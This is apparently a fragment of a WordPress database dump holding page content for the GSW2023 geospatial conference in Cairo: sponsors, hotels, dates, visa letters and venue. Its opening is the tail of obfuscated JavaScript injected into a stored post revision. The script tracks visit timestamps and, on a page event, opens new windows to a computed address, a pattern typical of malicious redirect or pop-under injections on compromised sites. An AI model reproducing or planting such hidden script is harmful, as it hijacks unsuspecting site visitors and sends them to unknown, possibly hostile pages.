Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:04:19','2023-06-09 22:04:19','',3066,'https://gsw2023.com/?p=4665',0,'revision','',0),
(4666,1,'2023-06-09 22:04:53','2023-06-09 22:04:53','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" image_scale_animation_on_hover=\"n\" image_hover_bg_color=\"n\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" 